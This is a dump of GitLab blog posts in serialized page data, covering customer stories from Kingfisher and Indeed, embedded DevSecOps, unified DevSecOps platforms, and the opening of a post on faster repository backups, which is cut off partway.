Whether you're looking to enhance GitLab's UI like Thales, improve package support like Scania, or optimize authentication like Kitware, the Co-Create Program welcomes organizations who want to actively shape GitLab's future while building valuable open source experience.\n\nContact your GitLab representative to learn more about participating in the Co-Create Program, or visit our [Co-Create page](https://about.gitlab.com/community/co-create/) for more information.\n",[899,900,901],"contributors","open source","customers",{"slug":903,"featured":91,"template":789},"the-co-create-program-how-customers-are-collaborating-to-build-gitlab",{"content":905,"config":913},{"title":906,"description":907,"authors":908,"heroImage":895,"date":910,"body":911,"category":702,"tags":912},"Kingfisher transforming the developer experience with GitLab","Learn how the international company focuses on DevSecOps, including automation, to reduce complexity in workflows for better efficiency.",[909],"Sharon Gaudin","2024-11-12","Kingfisher plc, an international home improvement company, has leaned into GitLab’s end-to-end platform to help it build a DevSecOps foundation that is revolutionizing its developer experience. And the company plans to continue that improvement by increasing its use of platform features, focusing on security, simplifying its toolchain, and increasing the use of automation.\n\n> \u003Cimg align=\"left\" width=\"200\" height=\"200\" hspace=\"5\" vspace=\"5\" alt=\"Chintan Parmar\" src=\"https://res.cloudinary.com/about-gitlab-com/image/upload/v1752176076/Blog/ro7u8p695zw9fllbk4j5.png\" style=\"float: left; margin-right: 25px;\"> “The whole point of this is to reduce friction for our engineers, taking away a lot of the complexity in their workflow, and bringing in best practices and governance,” says Chintan Parmar, site reliability engineering manager at Kingfisher. 
“In terms of what we've done and what we're doing at the moment, it really is about building a foundation in terms of CI/CD and changing the way we deploy to bring in consistency and improve the developer experience.”\n\nParmar talked about his team and their efforts during the [GitLab DevSecOps World Tour event](https://about.gitlab.com/events/devsecops-world-tour/) in London last month. In an on-stage interview with Sherrod Patching, vice president of Customer Success Management at GitLab, he laid out Kingfisher’s journey with the platform, which is enabling its teams, while also making it easier and faster to move software updates and new projects from ideation to deployment.\n\n[Kingfisher](https://www.kingfisher.com/en/index.html) is a parent company with more than 2,000 stores in eight countries across Europe. Listed on the London Stock Exchange and part of the Financial Times Stock Exchange (FTSE) 100 Index, the group reported £13 billion in total revenue in FY 2023/24. Its brands include B&Q, Screwfix, Castorama, and Brico Depot. \n\nThe company first adopted GitLab in 2016, using a free starter license, and then moved to Premium in 2020. In that time, it also has moved from on-premise to a cloud environment, started using shared GitLab runners and source code management, and began building out a CI/CD library that gives team members easy access to standardized and reusable components for typical pipeline stages, such as build, deploy, and test.\n\n## Tracking metrics that execs care about\n\nKingfisher also is tracking metrics, like deployment frequency, lead time to change, and change failure rates, with GitLab. And teams are analyzing value streams, mapping workflows, and finding bottlenecks. All of those metrics are being translated into data that company leaders can sink their teeth into. 
\n\n“Execs may not care about whether a merge request has been waiting 15 or 20 minutes, but they do care about how we translate that time value into dollars or pounds,” says Parmar, who used GitLab when he previously worked at [Dunelm Group, plc,](https://about.gitlab.com/customers/dunelm/) another major UK-based retailer. “Kingfisher is a very data-driven organization. We are looking to overlay these metrics to see where we can continue to improve our developer experience, eliminating slowdowns and manual tasks, while increasing automation.”\n\nWhile on-stage, Parmar made it clear that all the changes being made are aimed at improving software development and deployment. However, it’s equally paramount to making team members’ jobs easier, giving them more time and autonomy to do the kind of work they enjoy, instead of what can seem like a never-ending stream of repetitive, manual tasks. He noted that the team is so focused on easing workflows and giving engineers more time to be innovative, it has created a “developer experience squad.”\n\n## Putting people first while laying out priorities\n\nSo what’s coming next for Kingfisher and its engineering squads, which have about 600 practitioners?  \n\nAccording to Parmar, Kingfisher already has its priorities mapped out. Using GitLab to [move security left](https://about.gitlab.com/solutions/security-compliance/) is at the top of their list. The group also is focused on continuing to reduce its toolchain, and using automation to increase productivity. And he expects that early in 2025, teams will begin “dabbling” with the artificial intelligence capabilities in [GitLab Duo](https://about.gitlab.com/gitlab-duo/), a suite of AI-powered features in the platform that help increase velocity and solve key pain points across the software development lifecycle. Kingfisher will focus on how that can further increase its efficiency and productivity. 
\n\nTo get all of this done, Parmar says the first step is to ensure that people come first.\n\n“We’re focused on the hearts and minds of our people... and remembering that people can be attached to how they work through pipelines,” he adds. “People have different ways of building their pipelines. We need to understand what they need, what their workflows look like, and then work with them to find the right solution. After, we’ll go back to them with data that shows the improvements worked. So instead of telling them what they need, we find out what that is, and fix what’s slowing them down. That builds a very good rapport with our engineers.”\n\nChanging how a team creates and deploys software is a journey. Parmar suggests that collaboratively taking developers and security teams on that journey, instead of dragging them along, makes a big difference in ease of migration and in easing team members’ user experience.\n\n> Learn [how other GitLab customers use the DevSecOps platform](https://about.gitlab.com/customers/) to gain results for customers.\n",[901,475,709,799],{"slug":914,"featured":91,"template":789},"kingfisher-transforming-the-developer-experience-with-gitlab",{"content":916,"config":926},{"title":917,"description":918,"authors":919,"heroImage":921,"date":922,"body":923,"category":702,"tags":924},"How Indeed transformed its CI platform with GitLab","The world's #1 job site migrated thousands of projects to GitLab CI, boosting productivity and cutting costs. Learn the benefits they realized, including a 79% increase in daily pipelines.",[920],"Carl Myers","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750099351/Blog/Hero%20Images/Blog/Hero%20Images/Indeed-blog-cover-image-2_4AgA1DkWLtHwBlFGvMffbC_1750099350771.png","2024-08-27","***Editor's note: From time to time, we invite members of our customer community to contribute to the GitLab Blog. 
Thanks to Carl Myers, Manager of CI Platforms at Indeed, for sharing your experience with GitLab.***\n\nHere at Indeed, our mission is to help people get jobs. Indeed is the [#1 job site](https://www.indeed.com/about?isid=press_us&ikw=press_us_press%2Freleases%2Faward-winning-actress-viola-davis-to-keynote-indeed-futureworks-2023_textlink_https%3A%2F%2Fwww.indeed.com%2Fabout) in the world with more than 350 million unique visitors every month.\n\nFor Indeed's Engineering Platform teams, we have a slightly different motto: \"We help people to help people get jobs.\" As part of a data-driven engineering culture that has spent the better part of two decades always putting the job seeker first, we are responsible for building the tools that not only make this possible, but empower engineers to deliver positive outcomes to job seekers every day.\n\nGitLab Continuous Integration has allowed Indeed’s CI Platform team of just 11 people to effectively support thousands of users across the company. Other benefits Indeed has realized by moving to GitLab CI include:\n- 79% increase in daily pipelines\n- 10-20% lower CI hardware costs\n- Decreased support burden\n\n## Evolving our CI platform: From Jenkins to a scalable solution\n\nLike many large technology companies, we built our CI platform organically as the company scaled, using the de facto open source and industry standard solutions available at the time. Back in 2007, when Indeed had fewer than 20 engineers, we were using Hudson, Jenkins’ direct predecessor.\n\nToday, through nearly two decades of growth, we have thousands of engineers. As new technology became available, we made incremental improvements, switching to Jenkins around 2011. Another improvement allowed us to move most of our workloads to dynamic cloud worker nodes using [AWS EC2](https://aws.amazon.com/ec2/). 
As we entered the Kubernetes age, however, the system architecture reached its limits.\n\nJenkins’ architecture was not created with the cloud in mind. Jenkins operates by having a \"controller\" node, a single point of failure that runs critical parts of a pipeline and farms out certain steps to worker nodes (which can scale horizontally to some extent). Controllers are also a manual scaling axis.\n\nIf you have too many jobs to fit on one controller, you must partition your jobs across controllers manually. CloudBees offers ways to mitigate this, including the CloudBees Jenkins Operations Center, which allows you to manage your constellation of controllers from a single centralized place. However, controllers remain challenging to run in a Kubernetes environment because each controller is a fragile single point of failure. Activities like node rollouts or hardware failures cause downtime.\n\nIn addition to the technical limitations baked into Jenkins itself, our CI platform also had several problems of our own making. For example, we used the Groovy Jenkins DSL to generate jobs from code in each repository. This led to each project having its own copy-pasted job pipeline, resulting in hundreds of versions that were hard to maintain and update. While Indeed’s engineering culture values flexibility and allows teams to operate in separate repositories, this flexibility became a burden as teams spent too much time addressing regular maintenance requests.\n\nRecognizing our technical debt, we turned to the [Golden Path pattern](https://tag-app-delivery.cncf.io/whitepapers/platforms/), which allows flexibility while providing a default route to simplify updates and encourage consistent practices across projects.\n\nThe CI Platform team at Indeed is not very large. 
Our team of around 11 engineers supports thousands of users, fielding support requests, performing upgrades and maintenance, and enabling always-on support for our global company.\n\nBecause our team not only supports our GitLab instance but also the entire CI platform, including the artifact server, our shared build code, and multiple other custom components of our platform, we had our work cut out for us. We needed a plan that would help us address our challenges while making the most efficient use of our existing resources.\n\n## Moving to GitLab CI\n\nAfter a careful design review with key stakeholders, we decided to migrate the entire company from Jenkins to GitLab CI. The primary reasons for choosing GitLab CI were:\n- We were already using GitLab for source code management.\n- GitLab is a complete offering that provides everything we need for CI.\n- GitLab CI is designed for scalability and the cloud.\n- GitLab CI enables us to write templates that extend other templates, which is compatible with our golden path strategy.\n- GitLab is open source software and the GitLab team has always been supportive in helping us submit fixes, giving us extra flexibility and reassurance.\n\nBy the time we officially announced that the GitLab CI Platform would be generally available to users, we already had 23% of all builds happening in GitLab CI from a combination of grassroots efforts and early adopters.\n\nThe challenge of the migration, however, would be the long tail. Due to the number of custom builds in Jenkins, an automated migration tool would not work for the majority of teams. Most of the benefits of the new system would not come until the old system was at 0%. Only then could we turn off the hardware and save the CloudBees license fee.\n\n## Feature parity and the benefits of starting over\n\nThough we support many different technologies at Indeed, the three most common languages are Java, Python, and JavaScript. 
These language stacks are used to make libraries, deployables (web services or applications), and cron jobs (a process that runs at regular intervals, for example, to build a data set in our data lake). Each of these formed a matrix of project types (Java Library, Python Cronjob, JavaScript Webapp, etc.) for which we had a skeleton in Jenkins. Therefore, we had to produce a golden path template in GitLab CI for each of these project types.\n\nMost users could use these recommended paths without change, but for those who did require customization, the golden path would still be a valuable starting point and enable them to change only what they needed, while still benefiting from centralized template updates in the future.\n\nWe quickly realized that most users, even those with customizations, were happy to take the golden path and at least try it. If they missed their customizations, they could always add them later. This was a surprising result! We thought that teams who had invested in significant customization would be loath to give them up, but in the majority of cases teams just didn't care about them anymore. This allowed us to migrate many projects very quickly — we could just drop the golden path (a small file about 6 lines long with includes) into their project, and they could take it from there.\n\n## InnerSource to the rescue\n\nThe CI Platform team also adopted a policy of \"external contributions first\" to encourage everyone in the company to participate. This is sometimes called InnerSource. We wrote tests and documentation to enable external contributions — contributions from outside our immediate team — so teams that wanted to write customizations could instead include them in the golden path behind a feature flag. 
This let them share their work with others and ensure we didn't break them moving forward (because they became part of our codebase, not theirs).\n\nThis also had the benefit that particular teams who were blocked waiting for a feature they needed were empowered to work on the feature themselves. We could say \"we plan to implement the feature in a few weeks, but if you need it earlier than that we are happy to accept a contribution.\" In the end, many core features necessary for parity were developed in this manner, more quickly and better than our team had resources to do it. The migration would not have been a success without this model.\n\n## Ahead of schedule and under budget\n\nOur CloudBees license expired on April 1, 2024. This gave us an aggressive target to achieve the full migration. This was particularly ambitious considering that at the time, 80% of all builds (60% of all projects) still used Jenkins for their CI. This meant over 2,000 [Jenkinsfiles](https://www.jenkins.io/doc/book/pipeline/jenkinsfile/) would still need to be rewritten or replaced with our golden path templates.\n\nTo achieve this target, we made documentation and examples available, implemented features where possible, and helped our users contribute features where they were able.\n\nWe started regular office hours, where anyone could come and ask questions or seek our help to migrate. We additionally prioritized support questions relating to migration ahead of almost everything else. Our team became GitLab CI experts and shared that expertise inside our team and across the organization.\n\nAutomatic migration for most projects was not possible, but we discovered it could work for a small subset of projects where customization was rare. We created a Sourcegraph batch change campaign to submit merge requests to migrate hundreds of projects, and poked and prodded our users to accept these MRs.\n\nWe took success stories from our users and shared them widely. 
As users contributed new features to our golden paths, we advertised that these features \"came free\" when you migrated to GitLab CI. Some examples included built-in security and compliance scanning, Slack notifications for CI builds, and integrations with other internal systems.\n\nWe also conducted a campaign of aggressive \"scream tests.\" We automatically disabled Jenkins jobs that hadn't run or succeeded in a while, and told users that if they needed them, they could turn them back on. This was a low-friction way to identify which jobs were actually needed. We had thousands of jobs that hadn't been run a single time since our last CI migration (which was Jenkins to Jenkins). This told us we could safely ignore almost all of them.\n\nIn January 2024, we nudged our users by announcing that all Jenkins controllers would become read-only (no builds) unless an exception was explicitly requested. We had much better ownership information for controllers and they generally aligned with our organization's structure, so it made sense to focus on controllers rather than jobs. The list of controllers was also a much more manageable list than the list of jobs.\n\nTo obtain an exception, we asked our users to find their controllers in a spreadsheet and put their contact information next to each one. This enabled us to get a guaranteed up-to-date list of stakeholders we could follow up with as we sprinted to the finish line, but also enabled users to clearly let us know which jobs they absolutely needed. 
At peak, we had about 400 controllers; by January we had 220, but only 54 controllers required exceptions (several of them owned by us, to run our tests and canaries).\n\n![Indeed - Jenkins Controller Count graph](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750099357/Blog/Content%20Images/Blog/Content%20Images/image2_aHR0cHM6_1750099357392.png)\n\nWe had a manageable list of around 50 teams we divided among our team and started doing outreach to understand how each team was progressing with the migration. We spent January and February discovering that some teams planned to finish their migration without our help before February 28, others were planning to deprecate their projects before then, and a very small number were very worried they wouldn't make it.\n\nWe were able to work with this smaller set of teams and provide them with “white-glove” service. We still explained that while we lacked the expertise necessary to do the migration for them, we could partner with a subject matter expert from their team. For some projects, we wrote and they reviewed; for others, they wrote and we reviewed. In the end, all of our work paid off and we turned off Jenkins on the very day we had announced 8 months earlier.\n\n## The results: Enhanced CI efficiency and user satisfaction\n\nAt its peak, our Jenkins CI platform ran over 14,000 pipelines per day and serviced our thousands of projects. Today, our GitLab CI platform has run over 40,000 pipelines in a single day and regularly runs over 25,000 per day. The incremental cost of each job of each pipeline is similar to Jenkins, but without the overhead of hardware to run the controllers. Additionally, these controllers served as single points of failure and scaling limiters that forced us to artificially divide our platform into segments. While an apples-to-apples comparison is difficult, we find that with this overhead gone our CI hardware costs are 10-20% lower. 
Additionally, the support burden of GitLab CI is lower since the application automatically scales in the cloud, has cross-availability-zone resiliency, and the templating language has excellent public documentation available.\n\nA benefit just as important, if not more so, is that now we are at over 70% adoption of our golden paths. This means that we can roll out an improvement and over 5,000 projects at Indeed will benefit immediately with no action required on their part. This has enabled us to move some jobs to more cost-effective ARM64 instances, keep users' build images updated more easily, and better manage other cost-saving opportunities. Most importantly, our users are happier with the new platform.\n\n__About the author:__\n*Carl Myers lives in Sacramento, CA, and is the manager of the CI Platform team at Indeed. Carl has spent his nearly two-decade career dedicated to building internal tools and developer platforms that delight and empower engineers at companies large and small.*\n\n**Acknowledgements:**\n*This migration would not have been possible without the tireless efforts of Tron Nedelea, Eddie Huang, Vivek Nynaru, Carlos Gonzalez, Lane Van Elderen, and the rest of the CI Platform team. The team also especially appreciates the leadership of Deepak Bitragunta and Irina Tyree for helping secure buy-in, resources and company-wide alignment throughout this long project. 
Finally, our thanks go out to everyone across Indeed who contributed code, feedback, bug reports, and helped migrate projects.*\n\n**This is an edited version of the article [How Indeed Replaced Its CI Platform with Gitlab CI](https://engineering.indeedblog.com/blog/2024/08/indeed-gitlab-ci-migration/), originally published on the Indeed engineering blog.**",[901,109,925,475],"user stories",{"slug":927,"featured":91,"template":789},"how-indeed-transformed-its-ci-platform-with-gitlab",{"category":709,"slug":713,"posts":929},[930,944,956],{"content":931,"config":942},{"title":932,"description":933,"authors":934,"heroImage":936,"date":937,"body":938,"category":713,"tags":939},"Why now is the time for embedded DevSecOps","Learn how embedded development teams address long feedback cycles, manual compliance, and isolated development with DevSecOps.",[935],"Matt DeLaney","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749659978/Blog/Hero%20Images/automation.png","2025-07-01","For embedded systems teams, DevSecOps has traditionally seemed like an approach better suited to SaaS applications than firmware development. But this is changing. Software is now a primary differentiator in hardware products. New market expectations demand modern development practices. In response, organizations are pursuing \"embedded DevSecOps.\"\n\nWhat is embedded DevSecOps? The application of collaborative engineering practices, integrated toolchains, and automation for building, testing, and securing software to embedded systems development. Embedded DevSecOps includes necessary adaptations for hardware integration.\n## Convergence of market forces\nThree powerful market forces are converging to compel embedded teams to modernize their development practices.\n### 1. The software-defined product revolution\nProducts once defined primarily by their hardware are now differentiated by their software capabilities. 
The software-defined vehicle (SDV) market tells a compelling story in this regard. It's projected to grow from $213.5 billion in 2024 to [$1.24 trillion](https://www.marketsandmarkets.com/Market-Reports/software-defined-vehicles-market-187205966.html) by 2030, a massive 34% compound annual growth rate.\nThe software content in these products is growing considerably. By the end of 2025, the average vehicle is expected to contain [650 million lines of code](https://www.statista.com/statistics/1370978/automotive-software-average-lines-of-codes-per-vehicle-globally/). Traditional embedded development approaches cannot handle this level of software complexity. \n### 2. Hardware virtualization as a technical enabler\nHardware virtualization is a key technical enabler of embedded DevSecOps. Virtual electronic control units (vECUs), cloud-based ARM CPUs, and sophisticated simulation environments are becoming more prevalent. Virtual hardware allows testing that once required physical hardware.\n\nThese virtualization technologies provide a foundation for continuous integration ([CI](https://about.gitlab.com/topics/ci-cd/)). But their value is fully realized only when integrated into an automated workflow. Combined with collaborative development practices and automated pipelines, virtual testing helps teams detect issues much earlier, when fixes are far less expensive. Without embedded DevSecOps practices and tooling to orchestrate these virtual resources, organizations can't capitalize on the virtualization trend.\n### 3. The competitive and economic reality\nThree interrelated forces are reshaping the competitive landscape for embedded development:\n- The talent war has shifted decisively. As an embedded systems leader at a GitLab customer explained, “No embedded engineers graduating from college today know legacy tools like Perforce. They know Git. 
These young engineers will work at a company for six months on legacy tools, then quit.” Companies using outdated tools may lose their engineering future.\n- This talent advantage translates into competitive superiority. Tech-forward companies that attract top engineers with modern practices achieve remarkable results. For example, in 2024, [SpaceX](https://spacenews.com/spacex-launch-surge-helps-set-new-global-launch-record-in-2024/) performed more orbital launches than the rest of the world combined. Tech-forward companies excel at software development and embrace a modern development culture. This, among other things, creates efficiencies that legacy companies struggle to match. \n- The rising costs of embedded development — driven by long feedback cycles — create an urgent need for embedded DevSecOps. When developers have to wait weeks to test code on hardware test benches, productivity remains inherently low. Engineers lose context and must switch contexts when results arrive. The problem worsens when defects enter the picture. Bugs become more expensive to fix the later they're discovered. Long feedback cycles magnify this problem in embedded systems.\n\nOrganizations are adopting embedded DevSecOps to help combat these challenges.\n## Priority transformation areas\nBased on these market forces, forward-thinking embedded systems leaders are implementing embedded DevSecOps in the following ways. \n### From hardware bottlenecks to continuous testing\nHardware-testing bottlenecks represent one of the most significant constraints in traditional embedded development. 
These delays create the unfavorable economics described earlier — when developers wait weeks for hardware access, defect costs spiral.\nAddressing this challenge requires a multifaceted approach including: \n* Automating the orchestration of expensive shared hardware test benches among embedded developers  \n* Integrating both SIL (Software-in-the-Loop) and HIL (Hardware-in-the-Loop) testing into automated CI pipelines  \n* Standardizing builds with version-controlled environments\n\nEmbedded developers can accomplish this with GitLab's [On-Premises Device Cloud](https://gitlab.com/gitlab-accelerates-embedded/comp/device-cloud), a CI/CD component. Through automating the orchestration of firmware tests on virtual and real hardware, teams are better positioned to reduce feedback cycles from weeks to hours. They also can catch more bugs early on in the software development lifecycle.\n### Automating compliance and security governance\nEmbedded systems face strict regulatory requirements. Manual compliance processes are unsustainable.\nLeading organizations are transforming how they comply with these requirements by: \n* Replacing manual workflows with automated [compliance frameworks](https://about.gitlab.com/blog/introducing-custom-compliance-frameworks-in-gitlab/)  \n* Integrating specialized functional safety, security, and code quality tools into automated continuous integration pipelines  \n* Automating approval workflows, enforcing code reviews, and maintaining audit trails  \n* Configuring compliance frameworks for specific standards like ISO 26262 or DO-178C\n\nThis approach enables greater compliance maturity without additional headcount — turning what was once a burden into a competitive advantage. One leading electric vehicle (EV) manufacturer executes 120,000 CI/CD jobs per day with GitLab, many of which include compliance checks. And they can fix and deploy bug fixes to vehicles within an hour of discovery. 
This level of scale and speed would be extremely difficult without automated compliance workflows.\n### Enabling collaborative innovation\nHistorically, for valid business and technical reasons, embedded developers have largely worked alone at their desks. Collaboration has been limited. Innovative organizations break down these barriers by enabling shared code visibility through integrated source control and CI/CD workflows. These modern practices attract and retain engineers while unlocking innovation that would remain hidden in isolated workflows.\nAs one director of DevOps at a tech-forward automotive manufacturer (a GitLab customer) explains: \"It's really critical for us to have a single pane of glass that we can look at and see the statuses. The developers, when they bring a merge request, are aware of the status of a given workflow in order to move as fast as possible.\" This transparency accelerates innovation, enabling automakers to rapidly iterate on software features that differentiate their vehicles in an increasingly competitive market.\n## The window of opportunity\nEmbedded systems leaders have a clear window of opportunity to gain a competitive advantage through DevSecOps adoption. But the window won't stay open forever. Software continues to become the primary differentiator in embedded products, and the gap between leaders and laggards will only widen.\nOrganizations that successfully adopt DevSecOps will reduce costs, accelerate time-to-market, and unlock innovation that differentiates them in the market. The embedded systems leaders of tomorrow are the ones embracing DevSecOps today.\n> While this article explored why now is the critical time for embedded teams to adopt DevSecOps, you may be wondering about the practical steps to get started. 
Learn how to put these concepts into action with our guide: [4 ways to accelerate embedded development with GitLab](https://about.gitlab.com/blog/4-ways-to-accelerate-embedded-development-with-gitlab/).",[940,757,109,941],"embedded DevOps","automotive",{"featured":6,"template":789,"slug":943},"why-now-is-the-time-for-embedded-devsecops",{"content":945,"config":954},{"title":946,"description":947,"authors":948,"heroImage":950,"date":951,"body":952,"category":713,"tags":953},"Why are organizations moving to a unified DevSecOps platform?","Learn about GitLab's comprehensive, unified DevSecOps platform, which integrates tools, enhances security, and leverages AI for efficient software development.",[949],"Itzik Gan Baruch","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097063/Blog/Hero%20Images/Blog/Hero%20Images/securitylifecycle-light_securitylifecycle-light.png_1750097063583.png","2025-06-02","In today’s modern software development landscape, many organizations are migrating to the cloud and adopting DevSecOps processes. However, this transition presents a significant challenge: a proliferation of tools and legacy systems not designed for modern development. To adapt these systems to DevSecOps, organizations must create integrations between multiple tools for task management, CI/CD, security, monitoring, and more. The result? Operational complexity, high maintenance costs, and disrupted collaboration between development and operations teams. 
Additionally, developers experience frustration as they constantly switch between different tools to complete a single development flow – from planning to production.\n\n![The complexity and operational costs of integrating multiple tools into a DevSecOps process](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097077/Blog/Content%20Images/Blog/Content%20Images/image1_aHR0cHM6_1750097077287.jpg)\n\n\u003Ccenter>\u003Ci>How complex it can be to integrate multiple tools into a DevSecOps process\u003C/i>\u003C/center>\n\n\u003Cbr>\u003C/br>\n\nThe good news is that a solution exists: A comprehensive DevSecOps platform offering a unified approach to software development.\n\nThese platforms are built for organizations operating in cloud-based and DevSecOps environments, consolidating all software development stages — from code management, CI/CD processes, task management, and security to AI-driven automation — into a single platform. Centralizing all software development workflows in a unified interface enables development and operations teams to work more efficiently, streamline communication, and minimize operational complexities and disruptions.\n\nFurthermore, the developer experience significantly improves — engineers are much happier working with a product designed specifically for modern development needs.\n\nIn the sections below, we’ll explore how GitLab helps teams overcome common challenges — whether it’s managing projects and tasks, ensuring security and compliance, or adopting AI-powered development tools – all within a single, unified platform.\n\n## Integrated Agile project management\n\nGitLab provides a holistic solution in which project and task management are fully integrated across all stages of the software development lifecycle, such as CI/CD, enabling real-time tracking of development progress. Issues and epics directly link to automation processes, allowing a seamless flow from planning to production deployment. 
This approach enhances transparency across teams, reduces delays, and ensures that all stakeholders have a clear view of the development status in real-time.\n\n![Issues and epics directly link to automation processes, allowing a seamless flow from planning to production deployment.](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097077/Blog/Content%20Images/Blog/Content%20Images/image3_aHR0cHM6_1750097077288.jpg)\n\n## Built-in security\nGitLab strongly emphasizes integrating security capabilities end-to-end (security first). The platform integrates a wide range of automated security scanners, including:\n\n- [Dependency Scanning](https://docs.gitlab.com/user/application_security/dependency_scanning/)\n- [Static Application Security Testing (SAST)](https://docs.gitlab.com/user/application_security/sast/)\n- [Dynamic Application Security Testing (DAST)](https://docs.gitlab.com/user/application_security/dast/)\n- [Secret Detection](https://docs.gitlab.com/user/application_security/secret_detection/)\n- [Container Scanning](https://docs.gitlab.com/user/application_security/container_scanning/)\n\n![Security scanning capabilities integrated into the CI/CD process at various development stages](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097077/Blog/Content%20Images/Blog/Content%20Images/image2_aHR0cHM6_1750097077289.jpg)\n\n\u003Ccenter>\u003Ci>Security scanning capabilities integrated into the CI/CD process at various development stages\u003C/i>\u003C/center>\n\n\u003Cbr>\u003C/br>\n\nThese security checks are built directly into every phase of the software development lifecycle, including the CI/CD pipeline, to provide developers with immediate feedback on potential security issues early in the development cycle.\n\n## Compliance and regulatory requirements\n\nBeyond efficiency and user experience, many organizations — especially those in regulated industries such as financial institutions or large enterprises — must ensure their 
processes comply with strict security and compliance standards. They need the ability to enforce policies for different projects, such as mandating a security scanner every time a CI/CD pipeline runs on specific code branches (e.g., main or protected branches) or requiring specific approvals before merging code into the main branch.\n\nWith GitLab, this becomes easier through [Compliance Frameworks](https://about.gitlab.com/blog/introducing-custom-compliance-frameworks-in-gitlab/), a feature that allows organizations to define and enforce structured policies for selected projects. This ensures compliance with automatic regulatory and security requirements while maintaining a seamless and efficient developer workflow.\n\n## AI-powered development\n\n[GitLab Duo](https://about.gitlab.com/gitlab-duo/) provides AI-driven assistance across all development stages, eliminating the need to switch to external tools. Every AI-powered request is processed within the full context of the project and codebase, enabling smarter and more efficient work.\n\nAI can perform example tasks such as:\n- automatic task description generation\n- smart summarization of issue discussions, saving developers valuable time\n- advanced code review capabilities\n- code improvement and optimization suggestions\n- automated test generation\n- security vulnerability detection and remediation\n- troubleshooting root cause analysis for CI pipeline failures\n- privacy and Data Security\n\nUnderstanding the needs of regulated organizations, particularly in the public and financial sectors, GitLab offers a unique solution for running AI models in a secure environment. 
GitLab Duo Self-Hosted enables organizations to maintain full control over data privacy, security, and the deployment of large language models ([LLMs](https://about.gitlab.com/blog/what-is-a-large-language-model-llm/)) in their own infrastructure, ensuring:\n- data privacy protection\n- compliance with regulatory requirements\n- maximum security\n- AI benefits without external network dependencies or risks\n\n## Summary\n\nOrganizations need a comprehensive DevSecOps platform to streamline processes, enhance security, and accelerate innovation. GitLab delivers precisely that — a single application consolidating all essential development, security, and operational tools with built-in security integration and AI-powered automation.\n\nReady to see GitLab in action? Explore interactive demos of:\n\n- [GitLab Premium and Ultimate with Duo](https://gitlab.navattic.com/gitlab-premium-with-duo) – experience AI-powered development assistance\n\n- [Adding security to the CI/CD pipeline](https://gitlab.navattic.com/gitlab-scans) – see how integrated security scanning protects your software\n\n- [Compliance frameworks](https://gitlab.navattic.com/compliance) – discover how GitLab enforces policies across projects for better governance\n\n> Join the GitLab 18 virtual launch event to learn about the future of the DevSecOps platform, including the role of agentic AI. 
[Register today!](https://about.gitlab.com/eighteen/)",[709,475,757],{"slug":955,"featured":6,"template":789},"why-are-organizations-moving-to-a-unified-devsecops-platform",{"content":957,"config":967},{"title":958,"description":959,"authors":960,"heroImage":962,"date":963,"body":964,"category":713,"tags":965},"Overcome AI sprawl with a Value Stream Management approach","From The Source: Learn how an AI strategy based on Value Stream Management can stop AI sprawl and supply chain constraints and drive ROI.",[961],"Stephen Walters","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749665000/Blog/Hero%20Images/display-the-source-article-overcome-ai-sprawl-image-0492-1800x945-fy25.png","2025-01-06","This is a cross-over post about [overcoming AI sprawl with a Value Stream Management approach](https://about.gitlab.com/the-source/ai/overcome-ai-sprawl-with-a-value-stream-management-approach/).",[709,799,966],"performance",{"slug":968,"featured":6,"template":789,"externalUrl":969},"overcome-ai-sprawl-with-a-value-stream-management-approach","https://about.gitlab.com/the-source/ai/overcome-ai-sprawl-with-a-value-stream-management-approach/",{"category":721,"slug":725,"posts":971},[972,986,996],{"content":973,"config":984},{"title":974,"description":975,"authors":976,"heroImage":979,"date":980,"body":981,"category":725,"tags":982},"How we decreased GitLab repo backup times from 48 hours to 41 minutes","Learn how we tracked a performance bottleneck to a 15-year-old Git function and fixed it, leading to enhanced efficiency that supports more robust backup strategies and can reduce risk.",[977,978],"Karthik Nayak","Manuel Kraft","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097166/Blog/Hero%20Images/Blog/Hero%20Images/REFERENCE%20-%20display%20preview%20for%20blog%20images%20%282%29_2pKf8RsKzAaThmQfqHIaa7_1750097166565.png","2025-06-05","Repository backups are a critical component of any robust disaster recovery strategy. 
However, as repositories grow in size, the process of creating reliable backups becomes increasingly challenging.  Our own [Rails repository](https://gitlab.com/gitlab-org/gitlab) was taking 48 hours to back up — forcing impossible choices between backup frequency and system performance. We wanted to tackle this issue for our customers and for our own users internally. \n\nUltimately, we traced the issue to a 15-year-old Git function with O(N²) complexity and fixed it with an algorithmic change, __reducing backup times exponentially__. The result: lower costs, reduced risk, and backup strategies that actually scale with your codebase.\n\nThis turned out to be a Git scalability issue that affects anyone with large repositories. Here's how we tracked it down and fixed it. \n\n## Backup at scale\n\nFirst, let's look at the problem. As organizations scale their repositories and backups grow more complex, here are some of the challenges they can face:\n\n* **Time-prohibitive backups:** For very large repositories, creating a repository backup could take several hours, which can hinder the ability to schedule regular backups. 
\n* **Resource intensity:** Extended backup processes can consume substantial server resources, potentially impacting other operations.\n* **Backup windows:** Finding adequate maintenance windows for such lengthy processes can be difficult for teams running 24/7 operations.\n* **Increased failure risk:** Long-running processes are more susceptible to interruptions from network issues, server restarts, and system errors, which can force teams to restart the entire very long backup process from scratch.\n* **Race conditions:** Because it takes a long time to create a backup, the repository might have changed a lot during the process, potentially creating an invalid backup or interrupting the backup because objects are no longer available.\n\nThese challenges can lead to compromising on backup frequency or completeness – an unacceptable trade-off when it comes to data protection. Extended backup windows can force customers into workarounds. Some might adopt external tooling, while others might reduce backup frequency, resulting in potential inconsistent data protection strategies across organizations.\n\nNow, let's dig into how we identified a performance bottleneck, found a resolution, and deployed it to help cut backup times.\n\n## The technical challenge\n\nGitLab's repository backup functionality relies on the [`git bundle create`](https://git-scm.com/docs/git-bundle) command, which captures a complete snapshot of a repository, including all objects and references like branches and tags. This bundle serves as a restoration point for recreating the repository in its exact state.\n\nHowever, the implementation of the command suffered from poor scalability related to reference count, creating a performance bottleneck. As repositories accumulated more references, processing time increased exponentially. 
